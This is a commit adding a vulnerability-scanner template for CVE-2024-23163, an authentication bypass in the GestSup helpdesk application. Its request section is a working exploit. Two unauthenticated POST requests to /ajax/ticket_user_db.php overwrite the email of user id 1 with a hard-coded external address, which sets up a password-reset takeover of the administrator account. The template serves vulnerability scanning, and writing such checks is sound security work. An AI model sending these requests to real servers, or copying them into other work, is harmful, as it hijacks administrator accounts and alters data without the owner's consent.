Added CVE-2024-23163 by eeche

http/cves/2024/CVE-2024-23163.yaml

@@ -0,0 +1,51 @@
+id: CVE-2024-23163
+
+info:
+  name: GestSup Account takeover (CVE-2024-23163)
+  author: eeche, chae1xx1os, persona-twotwo, soonghee2, gy741
+  severity: Critical
+  impact: |
+   An attacker could bypass the authentication process and access the application as an administrator user by modifying the usermail field to a controlled email address and requesting a password reset.
+  remediation:
+   Apply necessary security patches or updates provided by the vendor to secure the ticket_user_db.php endpoint and ensure proper authentication checks are in place.
+  reference:
+   https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
+   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23163
+   https://doc.gestsup.fr/install/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-23163
+    cwe-id: CWE-287
+  metadata:
+    max-request: 2
+    vendor: gestsup
+    product: 
+     gestsup ver 3.2.15
+     Mariadb 10.7
+  tags: cve2024,cve,account-takeover,authentication
+
+requests:
+  - raw:
+      - |
+        POST /ajax/ticket_user_db.php HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: xmlhttprequest
+        Content-Type: application/x-www-form-urlencoded
+
+        modifyuser=1&lastname=poc&firstname=poc&phone=&mobile=&mail=dlckdgus200011@naver.com&company=111&id=1
+
+      - |
+        POST /ajax/ticket_user_db.php HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: xmlhttprequest
+        Content-Type: application/x-www-form-urlencoded
+
+        modifyuser=1&lastname=poc123&firstname=poc123&phone=&mobile=&mail=dlckdgus200011@naver.com&company=111&id=1
+
+
+    matchers:
+      - type: word
+        words:
+          - "poc123"
+        part: body